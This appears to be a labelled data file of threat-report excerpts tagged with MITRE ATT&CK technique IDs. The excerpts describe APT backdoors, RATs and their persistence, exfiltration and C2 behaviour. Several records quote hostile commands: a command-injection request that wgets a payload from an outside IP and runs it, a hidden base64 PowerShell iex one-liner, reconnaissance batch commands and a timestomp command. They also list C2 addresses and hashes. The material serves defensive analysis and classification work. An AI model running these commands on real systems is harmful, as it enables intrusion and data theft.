{"text1":"Office365DCOMCheck.ps1 and SystemDiskClean.ps1): wscript.exe \"Office365DCOMCheck.vbs\" \\\"PowerShell.exe\u00a0\u00a0-ExecutionPolicy bypass -WindowStyle hidden -NoProfile '<current PowerShell script>'\u00a0\u00a0\\\" After setting up persistent access, the payload checks to see if a value exists within a registry key in the HKCU hive whose name is the same as the scheduled task (ex","labels":"['T1036', 'T1012']"}
|
|
{"text1":"Office365DCOMCheck.vbs or SystemDiskClean.vbs) within the %TEMP% folder: CreateObject(\"WScript.Shell\").Run \"\" & WScript.Arguments(0) & \"\", 0, False The scheduled task will then run every five minutes, which provides persistent execution of the downloader script","labels":"['T1053.005', 'T1059', 'T1064', 'T1547.001']"}
|
|
{"text1":"Old Comnie Variant C2 Decoder\nimport requests\nimport sys\nimport re\ndef decode(data):\n  o = \"\"\n  for c in data:\n    if c == \"*\":\n      o += \".\"\n    elif c == \"|\":\n      o += \":\"\n    elif c == \"+\":\n      o += \";\"\n    else:\n      o += chr(ord(c)-49)\n  return o\nr = requests.get(sys.argv[1])\nfd = r.text\ndata = fd.split(\"++a++\")[1].split(\"++a++\")[0]\nprint(decode(data))\n \u00a0 Samples Analyzed eed5945c36ba22a2531dd2d9dd7bc4e17e68544d512be75670919caf287c1b4a 8026442b812469e48ccd11611ab6eacdcb312a8f1aabd563b7f4cb4868315e16 c8951038fd53321661274e5a12532c3fb6f73c75fd75503a1089c56990658fef 48a1ce103e5bf47c47cc5ed40b2dc687ebaf3674d667419287bcb1d0b8d8dda6 e06b797a24fa03a77e0d5f11b0cf0f4f038e0a9ea04d4981d39148969349c79c 7282d0709449abe16457864f58157cac8d007571dc5d463d393d1ae2605d17e0 bf6ee8426245b167a69292e513c0841d818b310dda87daea649221f4e0afd1b3 62b98dde60cb4dd0d0088bde222c5c2c4c92560cccf4753f1ce94e044093ab85 756952652290ad09fe03c8674d44eab2077b091398187c3abcb6f1ddc462c32d 639a49390c6f8597d36ec0bd245efa1b4a078c0506fb515e577a40389b39a614 29ed6eb3c882b018c2bb6bf2f8eb15069dc5510ca119abebf24f09e3c91f10aa 0e8a4e4d5ca501bad25a730fb5de534fa324c6ac23e0a573524693f2d996d105 316a0c6849f183a1a52d0c7648e722c4ca85bd57b0804a147c0c8656b84bbdb9 \u00a0 Identified C2s 121.126.211[.]94:8080 113.196.70[.]11:80,8080 133.130.101[.]47:443 123.51.208[.]157:443;8000;8080 \u00a0 C2 Hosting URLs (DDR URLs) github[.]com\/korlee5643 itsmonsee.tumblr[.]com allworldnewsway.blogspot[.]com","labels":"['T1043']"}
|
|
{"text1":"Once all the tasks have been executed completely, the malware breaks the loop, sends the termination buffer back, and clears all the footprints from the targeted machine: Deletes the LNK file from the startup directory","labels":"['T1070.004', 'T1547.009']"}
|
|
{"text1":"Once the payload is successfully executed, it will proceed to copy files to the following locations: C:\\ProgramData\\ManagerApp\\AdapterTroubleshooter.exe C:\\ProgramData\\ManagerApp\\15b937.cab C:\\ProgramData\\ManagerApp\\install.cab C:\\ProgramData\\ManagerApp\\msvcr90.dll C:\\ProgramData\\ManagerApp\\d3d9.dll The \u201cAdapterTroubleshooter.exe\u201d file is a legitimate binary which is leveraged to use the famous DLL search order hijacking technique.\u00a0 The \u201cd3d9.dll\u201d file is malicious and is loaded into memory by the legit binary upon execution.\u00a0 Once loaded, the DLL will then inject FinSpy into the Winlogon process","labels":"['T1055', 'T1574.001', 'T1574.002']"}
|
|
{"text1":"One such email that we were able to obtain was targeting users in Turkey, as shown in Figure 4: Figure 4: Sample spear phishing email containing macro-based document attachment The malicious Microsoft Office attachments that we observed appear to have been specially crafted for individuals in four countries: Turkey, Pakistan, Tajikistan and India","labels":"['T1598.002', 'T1204']"}
|
|
{"text1":"OopsIE Trojan Analysis The OopsIE Trojan delivered in these attacks is packed with SmartAssembly and further obfuscated with ConfuserEx v1.0.0","labels":"['T1027.002', 'T1027']"}
|
|
{"text1":"Our analysis of the backdoors used in the September 2018 attacks shows that AuditCred.dll\/ROptimizer.dll was similarly used: \u00a0 FileTokenBroker.dll\u00a0 (2017 attack) AuditCred.dll\/Roptimizer.dll\u00a0 (2018 attack) Launch Method Service Service Function Loader Component Loader Component Working directory %Windows%\\System32 %Windows%\\System32 Loaded Component Path %Windows%\\System32\\en-US %Program Files%\\Common Files\\System\\ado Loaded Component Blending Blends with .mui files Blend with ActiveX data Object dll files Table 1: Similarities of the Loader components in both incidents Analysis of backdoors used in 2018 The Lazarus group used a series of backdoors in their 2018 attacks, employing a complicated technique that involves three major components: AuditCred.dll\/ROptimizer.dll (detected by Trend Micro as BKDR_BINLODR.ZNFJ-A) \u2013 loader DLL that is launched as a service Msadoz<n>.dll (detected by Trend Micro as BKDR64_BINLODR.ZNFJ-A) \u2013 encrypted backdoor n = number of characters in the loader dll\u2019s filename Auditcred.dll.mui\/rOptimizer.dll.mui (detected by Trend Micro as TROJ_BINLODRCONF.ZNFJ-A) \u2013 encrypted configuration file Figure 1: Loading sequence of the modularized backdoor The loader DLL is installed as a service and uses different names (AuditCred and ROptimizer) on different machines","labels":"['T1055', 'T1574.001', 'T1218.011', 'T1574.002']"}
|
|
{"text1":"Our observation of related\u00a0actions\u00a0here: u ps start password stealing (Windows) Ps_mps\/ps_hwi start start password stealing (Linux, MIPS,\u00a0 ARM) uper_mps\/uper_hwi start rewrite hook module with a new version and launch it (Linux, MIPS, ARM) Nm_mps\/nm_hwi start\u00a0 \u2013ban -middle Scan ports and retrieve banners on the router\u00a0subnet\u00a0 (Linux, MIPS,\u00a0 ARM) U fsget * 7 *.docx, *.pdf, *.doc * search for docs with the given filetypes (Windows) S sinfo retrieve information on installed programs and launch commands: systeminfo, tasklist, ipconfig, netstat, route print, tracert www.google.com (Windows) weap_mps\/weap_hwi host188.128.123.52 port[25,26,110,465,995]\u00a0 typetcpconnect DDoS on 188.128.123.52 (Linux, MIPS,\u00a0 ARM) weap_mps\/weap_hwi\u00a0 typesynflood port80 cnt100000 spdmedium host212.175.109.10 DDoS on 212.175.109.10 (Linux, MIPS,\u00a0 ARM) The issued commands for the Linux plugins suggest the attackers controlled infected MIPS\/ARM devices.\u00a0We want to pay special attention to the DDoS commands meant for these routers","labels":"['T1003']"}
|
|
{"text1":"Part of packed VM PCODE After unpacking, the PCODE it will look like the following: Unpacked PCODE After unpacking the virtual machine PCODE is then decrypted: Decrypted VM PCODE The custom virtual machine supports a total of 34 instructions: Example of parsed PCODE In this example, the \u201c1b\u201d instruction is responsible for executing native code that is specified in parameter field","labels":"['T1140', 'T1027.001', 'T1027.002', 'T1497']"}
|
|
{"text1":"Persistence Mechanism Figure 3 shows that for persistence, the document creates two scheduled tasks and creates one auto-start registry entry pointing to the LNK file","labels":"['T1053.005', 'T1547.001']"}
|
|
{"text1":"POSHSPY WMI Component The WMI component of the POSHSPY backdoor leverages a Filter to execute the PowerShell component of the backdoor on a regular basis","labels":"['T1047', 'T1059.001']"}
|
|
{"text1":"powershell.exe -w 1 -exec Bypass -nologo -noprofile -c iex([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String((get-content C:\\ProgramData\\ZIPSDK\\ProjectConfManagerNT.ini)))); PowerShell one-liner Encoded text file Execution flow: The PowerShell code When PowerShell is invoked whether via WMI, wscript.exe, or mshta.exe, it executes a one-liner PowerShell code (as outlined above) that reads the encoded text file dropped in ProgramData and then decodes it","labels":"['T1036', 'T1059.001']"}
|
|
{"text1":"PowerShell Script \u201c58d2a83f777942.26535794.ps1\u201d is a multilayer obfuscated PowerShell script, which launches shellcode for a Cobalt Strike stager","labels":"['T1027', 'T1059.001']"}
|
|
{"text1":"Previous related research: https:\/\/sec0wn.blogspot.com\/2018\/05\/clearing-muddywater-analysis-of-new.html?m=1 https:\/\/reaqta.com\/2017\/11\/muddywater-apt-targeting-middle-east\/ https:\/\/blog.malwarebytes.com\/threat-analysis\/2017\/09\/elaborate-scripting-fu-used-in-espionage-attack-against-saudi-arabia-government_entity\/ https:\/\/www.sekoia.fr\/blog\/falling-on-muddywater\/ Decoy images by country Jordan The Hashemite Kingdom of Jordan, Ministry of Justice (mwjo.doc) DAMAMAX.doc Turkey Turkey\u2019s General Directorate of Security Turkey\u2019s Directorate General of Coastal Safety Turkey\u2019s General Directorate of Security (Onemli Rapor.doc) Turkey\u2019s Ministry of the Interior (Early election.doc) Saudi Arabia Document signed by the Major General Pilot, commander of the Saudi Royal Air Force KSA King Saud University (KSU) KSA King Saud University (KSU) Azerbaijan \u0130nki\u015faf \u00fc\u00e7\u00fcn g\u00f6r\u00fc\u015f.doc (meeting for development) Iraq Iraqi Ministry of Foreign Affairs Government of Iraq, the Treasury of the Council of Ministers Pakistan ECP.doc National Assembly of Pakistan.doc P.Police.doc Afghanistan President.doc, E-government of Afghanistan Technical details Below is a description of the malware extraction and execution flow, starting from the initial infection vector, running VBA code via a macro and then dropping the PowerShell code that establishes command-center communications, sends victim system information and then receives commands supported by the malware","labels":"['T1071']"}
|
|
{"text1":"Probably full and active window screenshot quality captureActiveQC 40 CaptureSites VPN*0,0 Login*0,0 mail*0,0 Security*0,0 Window titles of interest for screenshots, using left mouse button and Enter keypress hook important upLog.txt upSCRLog.txt upSpecial.txt upFile.txt upMSLog.txt List of files to send to C2 using bitsadmin.exe from the dedicated thread maxUpFileSizeKByte 1000000 Maximum size of file uploaded to C2 Servers http:\/\/108.61.189.174 Control server HTTP URL ZipPass KtJvOXulgibfiHk Password for uploaded zip archives browserPasswordCheckTimeout 300000 Milliseconds to wait between gathering key3.db, cookies.sqlite and other browser files in dedicated thread Most of the parameters are self-explanatory","labels":"['T1071', 'T1041']"}
|
|
{"text1":"Procmon shows the malicious module loaded using the regsvr32.exe process.\u00a0\u00a0 Phase two: Payload Analysis\u00a0 \u00a0 The only module the XSL script loads is Irdsnhrxxxfery64, which is packed using the UPX packer","labels":"['T1218.010', 'T1027.002']"}
|
|
{"text1":"RAR Creates RAR files per logical drive containing data with timestamps for the past 7 days, then uploads RAR to the C2 server using a POST command at the path \u201c\/FeedBack.php\u201d","labels":"['T1041', 'T1560']"}
|
|
{"text1":"Read a specified file\u2019s contents and send the data to the control server Write data sent by the control server to an existing file Mark a file to be deleted on reboot Marking a file for deletion on reboot","labels":"['T1070.006', 'T1041']"}
|
|
{"text1":"Reaver.v1 has been observed delivering a payload that uses HTTP for network communication, while versions 2 and 3 use a payload that uses raw TCP connections for this communication","labels":"['T1071', 'T1049']"}
|
|
{"text1":"Reaver will then install itself as a service in the event it is running with SeDebugPrivilege privileges.\u00a0 The service is configured with a name, description, and display name that is provided within the configuration","labels":"['T1007', 'T1543.003']"}
|
|
{"text1":"Registry key \u201cSoftware\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\\u201d is queried to gather proxy information with values ProxyEnable, Proxy: (NO), Proxy, ProxyServer","labels":"['T1090', 'T1012']"}
|
|
{"text1":"Remexi includes different modules that it deploys in its working directory, including configuration decryption and parsing, launching victim activity logging in a separate module, and seven threads for various espionage and auxiliary functions","labels":"['T1562.001', 'T1083']"}
|
|
{"text1":"RIPTIDE\u2019s first communication with its C2 server fetches an encryption key, and the RC4 encryption key is used to encrypt all further communication","labels":"['T1573']"}
|
|
{"text1":"SA Generates the following IRC client command that will be sent to the C2 server: PRIVMSG <username> : Hello ,my name is\u00a0 <IRC USER name>, Im ready my Computer Name is:<computer name> \u00a0 All of the commands, except for the VER command, must be issued by individuals in the IRC channel with nicknames that start with \u201cAS_\u201d or \u201cAF_\u201d","labels":"['T1033', 'T1082']"}
|
|
{"text1":"Sample(s) f1b2bc0831445903c0d51b390b1987597009cc0fade009e07d792e8d455f6db0 5cc62ad6baf572dbae925f701526310778f032bb4a54b205bada78b1eb8c479c DNS tbs1\/tbs2.microsoftonline.services Domains 0ffice365[.]agency 0ffice365[.]life 0ffice365[.]services 0nedrive[.]agency corewindows[.]agency microsoftonline[.]agency onedrive[.]agency sharepoint[.]agency skydrive[.]agency skydrive[.]services Sample eb33a96726a34dd60b053d3d1048137dffb1bba68a1ad6f56d33f5d6efb12b97 DNS tvs1\/tvs2.trafficmanager.live Domains akamaiedge[.]live \u00a0 akamaized[.]live \u00a0 akdns[.]live \u00a0 edgekey[.]live Table 7: Sample and Domain Associations The third cluster of domains had six different nameservers associated with them, but unlike the other two clusters, were all directly tied to each other","labels":"['T1007', 'T1543.003']"}
|
|
{"text1":"Screen capture and audio recording\u00a0 SpyNote RAT was able to take screen captures and, using the device\u2019s microphone, listen to audio conversations","labels":"['T1113', 'T1123']"}
|
|
{"text1":"SCT File Analysis The code of the Defender.sct file is an obfuscated JavaScript","labels":"['T1064', 'T1027']"}
|
|
{"text1":"SECOND STAGE JAVASCRIPT INTO POWERSHELL: The second stage JavaScript creates a PowerShell file with the same name in the same directory","labels":"['T1064', 'T1547.001', 'T1059.001']"}
|
|
{"text1":"Service providers have significant access to customer networks, enabling an attacker who had compromised a service provider to move laterally into the network of the service provider\u2019s customer","labels":"['T1543.003', 'T1021']"}
|
|
{"text1":"Serving the backdoor Another HTTP request is sent to the targeted server, with the following resource: \/?module=wget hxxp:\/\/67[.]209.177.163\/ibus -O \/tmp\/e3ac24a0bcddfacd010a6c10f4a814bc The above standard injection pulls the ibus payload and stores it on \/tmp\/e3ac24a0bcddfacd010a6c10f4a814bc Launching the backdoor The execution is issued using an additional HTTP request: \/?module=perl \/tmp\/ e3ac24a0bcddfacd010a6c10f4a814bc;sleep 2;rm -rf \/tmp\/ e3ac24a0bcddfacd010a6c10f4a814bc That executes the perl script, puts it to sleep for two seconds and deletes the file to remove any evidence","labels":"['T1070.004', 'T1074']"}
|
|
{"text1":"Similar to the previous case, if Avast and aswrundll.exe are on the machine, Irdsnhrxxxfery98 will be injected into that process instead of regsvr32.exe.\u00a0 Irdsnhrxxxfery64 injecting lrdsnhrxxfery98","labels":"['T1055', 'T1218.010']"}
|
|
{"text1":"Since Operation Clandestine Fox, we have observed this actor execute multiple attacks that did not rely on zero-day exploits.\u00a0The combination of this sustained operational tempo and lack of zero-day exploits may indicate that this group has changed strategy and has decided to attack more frequently and does not have steady access to zero-day exploit code.\u00a0No matter the strategy, this actor has shown an ability to operate successfully","labels":"['T1068', 'T1203']"}
|
|
{"text1":"Some of the instances used in this script are: $eNv:puBLic[13]+$ENv:pUBLIc[5]+'x' ($ENV:cOMsPEC[4,26,25]-jOin'') XOR encoding: The biggest section of the PowerShell script is XOR encoded using a single byte key, as shown in Figure 11","labels":"['T1573', 'T1027']"}
|
|
{"text1":"Specifies the screen coordinates to take -zip Name of password (from configuration data) protected zip archive -clipboard Screenshot file name where a bitmap from the clipboard is saved in Cache005 subdirectory, zipped with password from configuration Data exfiltration Exfiltration is done through the bitsadmin.exe utility","labels":"['T1113', 'T1115', 'T1560', 'T1132', 'T1486']"}
|
|
{"text1":"SpyNote RAT is capable of performing a variety of alarming functions that\u00a0includes: Activating the device\u2019s microphone and listening to live\u00a0conversations Executing commands on the\u00a0device Copying files from the device to a Command & Control (C&C)\u00a0center Recording screen\u00a0captures Viewing\u00a0contacts Reading SMS\u00a0messages The screenshot below shows part of the sandbox\u2019s report on the SpyNote RAT\u2019s signature and detected\u00a0functions: Figure 1 :\u00a0Zscaler Cloud Sandbox\u00a0Detection The fake Netflix app we are analyzing in this blog appears to be built using an updated version of SpyNote RAT builder, which was\u00a0leaked last\u00a0year","labels":"['T1113', 'T1083', 'T1043']"}
|
|
{"text1":"Strings in the backdoor are encrypted using a custom algorithm that uses XOR with a 4-byte key","labels":"['T1573', 'T1027']"}
|
|
{"text1":"Summary information for the three binaries we analyzed follows: MD5 364ff454dcf00420cff13a57bcb78467 SHA-256 8bca0031f3b691421cb15f9c6e71ce19335 5d2d8cf2b190438b6962761d0c6bb ssdeep 3072:n+1R4tREtGN4qyGCXdHPYK9l0H786 O26BmMAwyWMn\/qwwiHNl:n+1R43QcIL XdF0w6IBmMAwwCwwi Size 141.2 KB (144560 bytes) Type ELF 64-bit (stripped) Install as root \/bin\/rsyncd Root install desc synchronize and backup service Install as non-root ~\/.config\/dbus-notifier\/dbus-inotifier Non-root install desc system service d-bus notifier C2 azureon-line[.]com (TCP\/80) Usage Timeframe Late 2014 Table 1: Sample 1 \u2013 Late 2014 Sofacy 64-bit Fysbis MD5 075b6695ab63f36af65f7ffd45cccd39 SHA-256 02c7cf55fd5c5809ce2dce56085ba43795f2 480423a4256537bfdfda0df85592 ssdeep 3072:9ZAxHANuat3WWFY9nqjwbuZf454U NqRpROIDLHaSeWb3LGmPTrIW33HxIajF: 9ZAxHANJAvbuZf454UN+rv eQLZPTrV3Z Size 175.9 KB (180148 bytes) Type ELF 32-bit (stripped) Install as root \/bin\/ksysdefd Root install desc system kernel service defender Install as non-root ~\/.config\/ksysdef\/ksysdefd Non-root install desc system kernel service defender C2 198.105.125[.]74 (TCP\/80) Usage Timeframe Early 2015 Table 2: Sample 2 \u2013 Early 2015 Sofacy 32-bit Fysbis MD5 e107c5c84ded6cd9391aede7f04d64c8 SHA-256 fd8b2ea9a2e8a67e4cb3904b49c789d57ed 9b1ce5bebfe54fe3d98214d6a0f61 ssdeep 6144:W\/D5tpLWtr91gmaVy+mdckn6BCUd c4mLc2B9:4D5Lqgkcj+ Size 314.4 KB (321902 bytes) Type ELF 64-bit (not stripped) Install as root \/bin\/ksysdefd Root install desc system kernel service defender Install as non-root ~\/.config\/ksysdef\/ksysdefd Non-root install desc system kernel service defender C2 mozilla-plugins[.]com (TCP\/80) Usage Timeframe Late 2015 Table 3: Sample 3 \u2013 Late 2015 Sofacy 64-bit Fysbis Overall, these binaries are assessed as low sophistication, but effective","labels":"['T1082', 'T1543.003', 'T1569.002']"}
|
|
{"text1":"System info: Computer name System info using: cmd \/c systeminfo >%temp%\\temp.ini List of currently running process using: cmd \/c tasklist >%temp%\\temp.ini Exfiltration The data exfiltration process runs in the following sequence: The temp.ini files are copied into a text file that matches the pattern: From <COMPUTER-NAME> (<Month>-<Day> <Hour>-<Minute>-<Second>).txt","labels":"['T1082', 'T1074', 'T1057', 'T1486']"}
|
|
{"text1":"Team member or team identifier Analysis of the OwaAuth web shell revealed a PDB string with the \"SyberSpace\" username (see Figure 20)","labels":"['T1033', 'T1505.003']"}
|
|
{"text1":"Techniques for Analysis When I was analyzing this sample, the malware was unable to connect to its C2.\u00a0 However, I was still able to analyze the network traffic of the sample.\u00a0 How, you might ask?\u00a0 Using a hex editor and a script I wrote to encrypt text using the algorithm that this sample uses, I encrypted my own C2 address (192.168.1.108:7721) and replaced the hardcoded C2 address with my own encrypted address.\u00a0 I then opened a listener on my own IP on the respective port.\u00a0 \u00a0 [Screenshot 3] comparison of My IP (Left) vs C2 IP (Right) Next, using a debugger, I set a couple breakpoints in the Internet Communications function and ran the malware.\u00a0 The malware sample then connected to my IP and sent information to me, which I was able to observe using Wireshark.\u00a0 After I\u2019d captured the traffic, I was able to write another script to decrypt and decompress the traffic in order to view the data being sent.\u00a0 Additionally, I then wrote a socket script that detects the Gh0stRAT variant traffic, automatically decrypts the traffic, and then extracts the Implant_Opcodes for the sample.\u00a0 A second version of the script allows commands to be sent back to the malware, after I enumerated the exact command format for the sample.\u00a0 [Screenshot 4] Output of Version 1 of the script So far, the 2 opcodes that the sample has sent are 0x65 and 0x66, or Implant_Heartbeat and Implant_Login, respectively.\u00a0 \u201cHitting between the heartbeats\u201d When sending commands, first the sample must login in with 0x65, then you can send commands to it.\u00a0 However, you have to move fast as the sample will send an Implant_Heartbeat followed by an Implant_Login every 10 seconds or so, and if you try to send a command to the sample as it is responding with either opcode, it will ignore the command.\u00a0 A proof of concept of the command script can be found\u00a0here\u00a0, while the Implant extraction script and the Command Script will be included in the Appendix","labels":"['T1573', 'T1132']"}
|
|
{"text1":"TG-3390 actors favor At.exe to create scheduled tasks for executing commands on remote systems","labels":"['T1053.005', 'T1059']"}
|
|
{"text1":"TG-3390 actors frequently change the C2 domain's A record to point to the loopback IP address 127.0.0.1, which is a variation of a technique known as \"parking.\" Other variations of parking point the IP address to Google's recursive name server 8.8.8.8, an address belonging to Confluence, or to other non-routable addresses","labels":"['T1573', 'T1016']"}
|
|
{"text1":"TG-3390 actors keep track of and leverage existing ASPXTool web shells in their operations, preferring to issue commands via an internally accessible web shell rather than HttpBrowser or PlugX","labels":"['T1059', 'T1505.003']"}
|
|
{"text1":"The agent control panel has three tabs that have interfaces that allow the actor to issue commands, as well as upload and download files to and from the agent","labels":"['T1543.001', 'T1105']"}
|
|
{"text1":"The assembly code used to create the shellcode can be obtained from: https:\/\/github.com\/rapid7\/metasploit-framework\/blob\/master\/external\/source\/shellcode\/windows\/x86\/src\/block\/block_api.asm https:\/\/github.com\/rapid7\/metasploit-framework\/blob\/master\/external\/source\/shellcode\/windows\/x86\/src\/block\/block_reverse_http.asm The purpose of the shellcode is to obtain additional shellcode to execute using an HTTP request to the URL \u201chxxp:\/\/45.76.128[.]165:4443\/0w0O6\u201d","labels":"['T1071', 'T1064']"}
|
|
{"text1":"The backdoors they are deploying are difficult to detect and a significant threat to the privacy and security of enterprises, allowing attackers to steal information, delete files, install malware, and more","labels":"['T1518.001', 'T1070.004']"}
|
|
{"text1":"The C2 communications begins with a beacon to the following URL: hxxp:\/\/www.windowspatch[.]com\/khc?<hex(STDOUT of whoami command)> If the C2 server wishes to send a command, it will respond to the beacon above by echoing the whoami command results sent by the Trojan to the C2 in the URL","labels":"['T1033', 'T1571', 'T1008', 'T1043']"}
|
|
{"text1":"The code obtains the external IP address via an HTTP request using to \u201chttp:\/\/checkip.dyndns.org\/\u201d and uses a regular expression to locate an IP address from the HTTP response","labels":"['T1071', 'T1016']"}
|
|
{"text1":"The code then decodes this set of import symbols and resolves addresses for its networking and data stealing functionality: InternetCloseHandle InternetReadFile HttpSendRequestA HttpOpenRequestA HttpQueryInfoA InternetConnectA InternetCrackUrlA InternetOpenA InternetSetOptionW GetAdaptersInfo Much like the prior office monkey \u201catiumdag.dll\u201d component, this code collects identifying system information using standard win32 API calls: Computer name \u2013 GetComputerNameW User name \u2013 GetUserNameW Adapter GUID, ip address, mac address \u2013 GetAdaptersInfo Windows version \u2013 GetVersionExW It then uses the runtime resolved networking API calls to send the collected data back to a hardcoded c2 and set of urls","labels":"['T1106', 'T1140', 'T1016']"}
|
|
{"text1":"The command handler obtains a command identifier from the C2 server and adds 0xFFFFFF9B to this value and then uses a switch statement to determine the appropriate command to execute","labels":"['T1016', 'T1059']"}
|
|
{"text1":"The configuration data used by the backdoor has the following structure: #pragma pack(push, 1) struct st_cncconfig { _WORD id; _BYTE byte2; _BYTE byte3; _QWORD pCnCBeg; _QWORD pCnCEnd; _QWORD pLastElement; }; #pragma pack(pop) To be able to enter the data into the database, Linux.BackDoor.Fysbis.1 converts the configuration data into the following structure: #pragma pack(push, 1) struct st_crypted_config_data { _WORD id; _BYTE byte2; _BYTE byte3; char* pCnC; }; #pragma pack(pop) Before the configuration data is encrypted with the RC4 algorithm, 11 signature bytes are added to the end of the data (11 bytes are stored in the backdoor's body)","labels":"['T1005', 'T1140', 'T1027.002', 'T1041', 'T1560', 'T1486']"}
|
|
{"text1":"The contents of the batch files vary depending on the OS (x64 vs x86). The batch files perform these tasks: Stop the service COMSysApp Configure the service to autostart (to set up persistence on the system) Modify registry keys to launch the DLL unser svchost.exe Specify the malicious DLL path to be loaded into the svchost process","labels":"['T1055', 'T1112', 'T1064', 'T1569.002']"}
|
|
{"text1":"The data dump included the 0000000000.bat file, which when executed on an infected system would run the following commands to gather information to be sent back to the C2 server: whoami hostname ipconfig \/all net user \/domain net group \/domain net group \u201cdomain admins\u201d \/domain net group \u201cExchange Trusted Subsystem\u201d \/domain net accounts \/domain net user net localgroup administrators netstat -an tasklist systeminfo reg query \u201cHKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\u201d schtasks \/query \/FO List \/TN \u201cGoogleUpdatesTaskMachineUI\u201d \/V | findstr \/b \/n \/c:\u201dRepeat: Every:\u201d WMIC \/Node:localhost \/Namespace:\\\\root\\SecurityCenter2 Path AntiVirusProduct Get displayName \/Format:List This batch script is also interesting as it uses echo commands to include headers before each of the command results","labels":"['T1069', 'T1087']"}
|
|
{"text1":"The data field within the message is a string of custom base64 encoded data that the malware decodes using the same custom base64 routine mentioned earlier and decrypts it using AES and the pre-shared key","labels":"['T1573', 'T1140', 'T1132']"}
|
|
{"text1":"The downloaded .7zip file contains a .lnk file that, once pressed, initializes the malware","labels":"['T1547.009', 'T1105']"}
|
|
{"text1":"The dropper installs the backdoor, sets its attributes to \u201chidden\u201d, and sets a random file date and time When the dropper installs the backdoor, it sets its attributes to \u201chidden\u201d and sets file date and time to\u00a0 random values using the touch command: touch \u2013t YYMMDDMM \u201c\/path\/filename\u201d > \/dev\/null","labels":"['T1070.006', 'T1564.001', 'T1124']"}
|
|
{"text1":"The encrypted message is then Base64 encoded, replacing all the \u2018\/\u2019 and \u2018+\u2019 characters with the \u2018.\u2019 and \u2018-\u2019 characters, respectively","labels":"['T1027', 'T1132']"}
|
|
{"text1":"The executable will drop the packaged QUADAGENT PowerShell script using the filename Office365DCOMCheck.ps1 in addition to a VBScript file with the same filename which will assist in the execution of it","labels":"['T1036', 'T1064']"}
|
|
{"text1":"The file is saved to: C:\\Users\\[Username]\\AppData\\Local\\Temp\\notepad.exe 00 00 04 Content after command ID is written to: C:\\Users\\[Username]\\AppData\\Local\\Temp\\notepad2.exe 00 00 05 The files notepad1.exe and notepad2.exe are concatenated together and written to C:\\Users\\[Username]\\AppData\\Local\\Temp\\newnotepad.exe and executed 00 00 06 The contents of the following file is sent to the server: C:\\Users\\[Username]\\AppData\\Local\\Temp\\note.txt 00 00 07 The string following the command ID is executed using \"cmd \/C\" and results are sent to server Links to APT3 On October 28, we observed APT3 sending out spearphishing messages containing a compressed executable attachment","labels":"['T1033', 'T1036', 'T1087', 'T1204']"}
|
|
{"text1":"The first email displays the following decoy document to the infected user and download the following payload:hxxp:\/\/discgolfglow[.]com:\/wp-content\/plugins\/maintenance\/images\/worker.jpgThe second email displays the following decoy document to the infected user and downloads the following payload:hxxp:\/\/acddesigns[.]com[.]au\/clients\/ACPRCM\/kingstone.jpgIn both cases, the downloaded payload is the ROKRAT malware.The first tasks of this variant of ROKRAT is to check the operating system version","labels":"['T1105', 'T1497']"}
|
|
{"text1":"The first stage shellcode contains an interesting NOP sled with alternative instructions, which was most likely designed in such a way to avoid detection by antivirus products looking for large NOP blocks inside flash files: NOP sled composed of 0x90 and 0x91 opcodes The main purpose of the initial shellcode is to download second stage shellcode from hxxp:\/\/89.45.67[.]107\/rss\/5uzosoff0u.iaf","labels":"['T1064', 'T1027', 'T1105']"}
|
|
{"text1":"The following commands are available: Command SubCommand Description VER Generates the following IRC client command that will be sent to the C2 server: \u00a0 PRIVMSG <username> :\u00a0\u00a0\u00a0 8 LED= 20160124 KILL Trojan disconnects from the IRC server and terminates itself RESET Trojan disconnects from the IRC server and runs the executable again OS Obtains the Windows version and responds to the C2 with the following message \u201cPRIVMSG <username> :<one of the following version strings>\u201d: \u00a0 Windows NT Windows 95 Windows 98 Windows ME Windows 2003 Windows XP Windows 7 Windows Vista Unkown os info !SH EXEC Not supported MD Creates a specified directory","labels":"['T1106', 'T1010']"}
|
|
{"text1":"The following commands are supported by the malware: Command ID Description 00 00 00 Content after command ID is written to: C:\\Users\\[Username]\\AppData\\Local\\Temp\\notepad1.exe 00 00 01 Deletes the files: C:\\Users\\[Username]\\AppData\\Local\\Temp\\notepad.exe C:\\Users\\[Username]\\AppData\\Local\\Temp\\newnotepad.exe 00 00 02 Malware exits 00 00 03 Malware downloads the URL that follows the command ID","labels":"['T1033', 'T1204']"}
|
|
{"text1":"The following functions are called when the application attempts to initialize the menu:ETransaksi.Speed(); \/\/ Legitimate class, but method is the first wrapped function that leads to malicious code ProjectData.EndApp(); \/\/ Closes the application before rest of legitimate Sales System Application functions are calledThe \u201cSpeed\u201d method in the legitimate ETransaksi class contains legitimate code from the Sales System Application; however, the author of this tool includes this code in an if\/else construct that bypasses these instructions by setting a false flag to skip the legitimate code and execute the next step to the malicious code","labels":"['T1140', 'T1036', 'T1027.001', 'T1189']"}
|
|
{"text1":"The following graph view from IDA shows these steps.These execution steps allow the launch of the new ROKRAT variant by decoding the PE binary and injecting into the cmd.exe process","labels":"['T1055', 'T1059']"}
|
|
{"text1":"The following HTTP request from the Helminth backdoor (SHA256: 1fb69090be8a2e11eeb220b26ee5eddf1e3fe81ffa59c47d47d01bf90c2b080c) downloaded the similar batch script: GET \/update-index.aspx?req=1786873725%5Cbat&m=d HTTP\/1.1 Host: update-kernal[.]net Connection: Keep-Alive We performed a code comparison to visualize the similarities between the batch script delivered as the default command in Poison Frog is to the script provided to the Helminth backdoor","labels":"['T1071', 'T1064']"}
|
|
{"text1":"The following screenshot shows the command execution functionality in action: \u00a0 Figure 4:\u00a0Command\u00a0Execution The\u00a0paramString\u00a0parameter shown in the above screenshot\u00a0can be any command received from C&C","labels":"['T1113', 'T1059']"}
|
|
{"text1":"The frequent checking ensures that any changes made will be quickly followed, and the repeated attempts to run the Revenge RAT binary make it almost certain that even if the process is terminated, the RAT will be running again soon","labels":"['T1057', 'T1043']"}
|
|
{"text1":"The function builds the contents of a second file by concatenating several strings together, but this second file is a .sct file that the function will write to a file %TEMP%\\12-B-366.txt","labels":"['T1070.006', 'T1140']"}
|
|
